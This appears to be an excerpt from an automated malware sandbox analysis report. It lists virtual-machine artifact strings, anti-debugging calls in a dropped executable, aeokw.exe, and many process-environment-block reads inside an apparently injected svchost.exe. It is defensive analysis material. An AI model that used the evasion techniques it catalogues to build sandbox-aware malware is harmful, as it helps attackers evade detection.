Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000005.00000000.290260130.0000000005EAB000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
Source: explorer.exe, 00000005.00000000.268351234.000000000510C000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00dRom0cY
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D77A95 IsDebuggerPresent,
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D7558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 1_2_00D786ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Code function: 2_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Local\Temp\aeokw.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E131B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302DB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030F8B58 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302F358 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302DB60 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E138A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03031B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03031B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030DD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03052397 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030F5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A53CA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304DBE9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03038A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03025210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03043A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030EAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03064A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03064A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030EEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030B4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030DB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030F8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0306927A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0303AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0303AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03052ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03052AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03044120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0305A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0304C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03052990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_030B41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030690AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030258EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03024F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03038794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03058E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03037E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BFE87 mov eax, dword ptr fs:[00000030h]
